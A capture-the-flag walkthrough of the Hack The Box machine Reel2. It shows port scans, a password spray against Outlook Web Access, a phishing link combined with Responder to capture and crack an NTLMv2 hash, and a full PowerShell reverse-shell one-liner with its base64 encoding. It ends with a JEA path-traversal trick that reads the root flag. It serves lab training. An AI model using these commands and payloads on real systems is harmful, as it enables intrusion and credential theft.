Reel2

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.210 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Tue Sep 13 12:33:23 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.045s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5985/tcp open  wsman
6001/tcp open  X11:1
6002/tcp open  X11:2
6004/tcp open  X11:4
6005/tcp open  X11:5
6006/tcp open  X11:6
6007/tcp open  X11:7
6008/tcp open  X11:8
6010/tcp open  x11
6011/tcp open  x11
6012/tcp open  x11
6017/tcp open  xmail-ctrl
6024/tcp open  x11
8080/tcp open  http-proxy

# Nmap done at Tue Sep 13 12:33:49 2022 -- 1 IP address (1 host up) scanned in 26.53 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 10.10.10.210 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Tue Sep 13 12:44:45 2022 as: nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 -oN targeted 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.049s latency).

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp  open  ssl/http   Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after:  2025-07-30T10:12:46
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
|_ssl-date: 2022-09-13T10:45:54+00:00; +4s from scanner time.
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
6008/tcp open  msrpc      Microsoft Windows RPC
6010/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open  msrpc      Microsoft Windows RPC
6012/tcp open  msrpc      Microsoft Windows RPC
6017/tcp open  msrpc      Microsoft Windows RPC
6024/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Welcome | Wallstant
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 13 12:45:50 2022 -- 1 IP address (1 host up) scanned in 65.39 seconds

We can't access the website on port 80.

The HTTPS website shows the default IIS web server page.

If we do subdirectories enumeration, we'll see a OWA login page.

gobuster dir -u https://10.10.10.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php -k

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

• -x file extensions to search for.

• -k skips TLS certificate verification.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.210
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/09/14 14:22:50 Starting gobuster in directory enumeration mode
===============================================================
/public               (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/exchange             (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/Public               (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/rpc                  (Status: 401) [Size: 13]                                
/owa                  (Status: 301) [Size: 0] [--> /owa/]                     
/Exchange             (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/RPC                  (Status: 401) [Size: 13]                                
/ecp                  (Status: 301) [Size: 148] [--> https://10.10.10.210/ecp/]
/ews                  (Status: 301) [Size: 148] [--> https://10.10.10.210/ews/]
/PUBLIC               (Status: 302) [Size: 147] [--> https://10.10.10.210/owa] 
                                                                               
===============================================================
2022/09/14 14:25:15 Finished
===============================================================

We'll see the login page in the /owa directory. But we don't have credentials yet.

The website on port 8080, shows a Wallstant application, that looks similar to Facebook.

Exploitation

Let's create a new account.

The main page shows a list of users.

We can get a list of all users registered in the app by searching for an empty space.

http://10.10.10.210:8080/search?q=

The following command will take all these users, and put them in a file called users.

curl -s "http://10.10.10.210:8080/search?q=" | grep user_follow_box_a | sed 's/u\// /g' | tr "\"" " " | sed 's/<p>/ /g' | awk '{print $7 " " $5}' > users

gregg quimbly
joseph Moore
teresa trump
cube cube
sven svensson
alex miller
michael doe
egre55 egre55
travis scott
davis marshall
alfa8sa alfa8sa
jeff Perez
frans allen
james Martin
stig helmer
donald Johson
jhon smith
chris Thompson
kalle garcia
cube0x0 cube0x0
lee rodriguez
jenny adams
david Taylor
jim morgan
lars larsson
bob davis
charles Jackson
fred sanders

We can make variants of the dictionary with the spindrift tool. Let's add to the dictionary the same users, but with the format {f}.{last}.

spindrift users --format {f}.{last} >> users

g.quimbly
j.moore
t.trump
c.cube
s.svensson
a.miller
m.doe
e.egre55
t.scott
d.marshall
j.perez
f.allen
j.martin
s.helmer
d.johson
j.smith
c.thompson
k.garcia
c.cube0x0
l.rodriguez
j.adams
d.taylor
j.morgan
l.larsson
b.davis
c.jackson
f.sanders

On the Wallstant app there are only two posts.

The second one is saying that the summer of 2020 was hot.

We could try the Summer2020 password to do a password spraying attack with atomizer, against the OWA login page we saw earlier, using the users dictionary.

atomizer owa 10.10.10.210 "Summer2020" users

[*] Trying to find autodiscover URL                                              
[+] Using OWA autodiscover URL: https://10.10.10.210/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally                            
[+] Got internal domain name using OWA: HTB                             
[*] Starting spray at 2021-01-30 12:33:56 UTC                            
[-] Authentication failed: HTB\jmoore:Summer2020 (Invalid credentials)     
[-] Authentication failed: HTB\gquimbly:Summer2020 (Invalid credentials)
...
[+] Found credentials: HTB\s.svensson:Summer2020
...
[+] Dumped 1 valid accounts to owa_valid_accounts.txt

The password Summer2020 is valid for the s.svensson user. Let's log in in the OWA login page.

As the website seems to be in Swedish, I will translate it to English with the Google Translator extension.

We could try to send an email to every contact available, which will contain a link to a HTTP server set by us. So if the user click on the link, we will see a request with some information. First, set a netcat listener on port 80.

nc -lvnp 80

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now, go to the people picker, and select every user.

https://10.10.10.210/owa/?ae=PreFormAction&t=IPM.Note&a=PeoplePicker

Then sent an email with a link to http://10.10.14.11.

After a while, we should see a request from 10.10.10.210 on the netcat listener, which has a User-Agent header with the value Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018.

listening on [any] 80 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 54392
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018
Content-Type: application/x-www-form-urlencoded
Host: 10.10.14.11
Content-Length: 0
Connection: Keep-Alive

Some is trying to access a resource which doesn't exist. We could use responder to poison the request, and make the user authenticate against the responder, so we can get their NTLMv2 hash. Make sure to set the HTTP server to ON on the responder configuration file.

responder -I tun0

• -I network interface to use.

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [OFF]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.11]
    Responder IPv6             [dead:beef:2::1009]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-49HJGZUL8KT]
    Responder Domain Name      [H6RX.LOCAL]
    Responder DCE-RPC Port     [48763]

[+] Listening for events...

[HTTP] Sending NTLM authentication request to 10.10.10.210
[HTTP] POST request from: ::ffff:10.10.10.210  URL: / 
[HTTP] NTLMv2 Client   : 10.10.10.210
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash     : k.svensson::htb:1cfa10872f3e3ef1:B194C796E5BD5D7F2FA2A3FD48D00564:01010000000000003C3144C33AC8D801C7544ABC3415A1660000000002000800410031004900590001001E00570049004E002D004200580049004D0039005400530034005000500039000400140041003100490059002E004C004F00430041004C0003003400570049004E002D004200580049004D0039005400530034005000500039002E0041003100490059002E004C004F00430041004C000500140041003100490059002E004C004F00430041004C000800300030000000000000000000000000400000B980194F732226BB7FA9ACB35492650E1BF3CF5F1EB3FD96BF6372E8ADB952C90A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00310031000000000000000000

Let's try to break the hash with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kittycat1        (k.svensson)     
1g 0:00:00:04 DONE (2022-09-14 15:07) 0.2347g/s 1682p/s 1682c/s 1682C/s horoscope..emoemo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Now that we have credentials, as port 5985 (WinRM) is open we could try to get a shell with evil-winrm as the k.svensson user.

evil-winrm -i 10.10.10.210 -u "k.svensson" -p "kittycat1"

• -i remote host IP address.

• -u username.

• -p password.

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.    + CategoryInfo          : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException    + FullyQualifiedErrorId : CommandNotFoundException>

But we can't execute commands because we get an error. But, if WinRM is available there is another way to get a shell. You will need to install powershell and gss-ntlmssp with apt. Then, open a shell with PowerShell.

pwsh

PowerShell 7.2.6
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/alfa8sa>

Create a $pass secure string with the password kittycat1.

$pass = ConvertTo-SecureString 'kittycat1' -AsPlainText -Force

Create a $cred object with the htb\k.svensson and the $pass secure string.

$cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)

Finally, use Enter_PSSession to get a shell.

Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate

[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

But we still can't execute commands. That's because we are in a ConstrainedLanguage shell.

$ExecutionContext.SessionState.LanguageMode

ConstrainedLanguage

We can only execute the following commands.

Get-Command

CommandType     Name                                               Version    Source                                                                    
-----------     ----                                               -------    ------                                                                    
Function        Clear-Host                                                                                                                              
Function        Exit-PSSession                                                                                                                          
Function        Get-Command                                                                                                                             
Function        Get-FormatData                                                                                                                          
Function        Get-Help                                                                                                                                
Function        Measure-Object                                                                                                                          
Function        Out-Default                                                                                                                             
Function        Select-Object

But, we can bypass this restriction by creating functions or with the & operator.

function getlocation {Get-Location}; getlocation

Path                         
----                         
C:\Users\k.svensson\Documents

Let's get a proper shell. First, let's set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now, I will make a file called shell with the TCP reverse shell one liner from the Nishang GitHub repository.

nano shell

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Then, encode the content as utf-16le, and the base64.

cat shell | iconv -t utf-16le | base64 -w 0

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACcALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=

If we execute the encoded string with PowerShell using the -enc argument, we should get a normal shell as the user.

& {powershell -enc JABjA...kACgA=}

listening on [any] 4444 ...

connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 23245
PS C:\Users\k.svensson\Documents> whoami
htb\k.svensson
PS C:\Users\k.svensson\Documents> type \users\k.svensson\desktop\user.txt
545fc9d141cd31578f03049409c68e65

Privilege Escalation

In the current directory there are a few configuration files.

dir \Users\k.svensson\Documents

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        7/30/2020   5:14 PM                WindowsPowerShell                                                     
-a----        7/31/2020  11:58 AM           5600 jea_test_account.psrc                                                 
-a----        7/31/2020  11:58 AM           2564 jea_test_account.pssc

If we check the jea_test_account.psrc file, we'll see a function called Check-File which checks the content of C:\ProgramData\.

type jea_test_account.psrc | Select-String -NotMatch "^#"

...
FunctionDefinitions = @{
    'Name' = 'Check-File'
    'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like 
"C:\ProgramData\*" ; if($check) {get-content $Path}} }
...

As we can see jea_test_account.psrc is a user.

net user

-------------------------------------------------------------------------------
a.miller                 Administrator            b.davis                  
c.jackson                d.johson                 d.marshall               
d.taylor                 e.marin                  f.allen                  
f.sanders                g.quimbly                Guest                    
j.adams                  j.johson                 j.marin                  
j.moore                  j.morgan                 j.perez                  
j.smith                  jea_test_account         k.garcia                 
k.jackson                k.svensson               krbtgt                   
l.larsson                l.rodriguez              m.doe                    
m.moore                  r.jackson                r.martin                 
r.tayor                  r.thompson               s.helmer                 
s.mooire                 s.svensson               SM_b1017128ac394c669     
SM_b7973ae6f38e4d1b8     SM_d8c9a1c1fce54bca9     SM_fffa25e273cb4e9bb     
t.martin                 t.scott                  t.trump                  
w.thompson               
The command completed with one or more errors.

This might be handy later. In the desktop folder there is a Sticky Notes.lnk file. We look for any credentials in the default Sticky Notes path.

cd \users\k.svensson\appdata\roaming\stickynotes

If we search recursively for the user jea_test_account.psrc, we'll see that there are some credentials inside the Local Storage\leveldb\000003.log file.

dir -recurse | select-string "jea_test_account"

...
<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>
...

Let's try to get a shell as the user jea_test_account.psrc, the same way we did with k.svensson.

pwsh

$pass = ConvertTo-SecureString 'Ab!Q@vcg^%@#1' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('htb\jea_test_account', $pass)

Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate

Enter-PSSession: Connecting to remote server 10.10.10.210 failed with the following error message : ERROR_ACCESS_DENIED: Access is denied.  For more information, see the about_Remote_Troubleshooting Help topic.

But we get an error. This might happen because we have to include the configuration files we saw earlier.

Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account

[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. 

Now we get a shell, but we still can't execute normal commands. If we list what command we are able to use, we'll see the Check-File command we saw in the configuration file.

Get-Command

CommandType     Name                                               Version    Source                                                                     
-----------     ----                                               -------    ------                                                                     
Function        Check-File                                                                                                                               
Function        Clear-Host                                                                                                                               
Function        Exit-PSSession                                                                                                                           
Function        Get-Command                                                                                                                              
Function        Get-FormatData                                                                                                                           
Function        Get-Help                                                                                                                                 
Function        Measure-Object                                                                                                                           
Function        Out-Default                                                                                                                              
Function        Select-Object

With the Check-File command, we could see the content of C:\ProgramData\, but we could try to do a directory path traversal to reach the root flag. All we have to do is execute the following command, and reap the harvest and take the root flag.

Check-File C:\ProgramData..\Users\Administrator\Desktop\root.txt

2b4428ee3230ba53282e255244aad8d8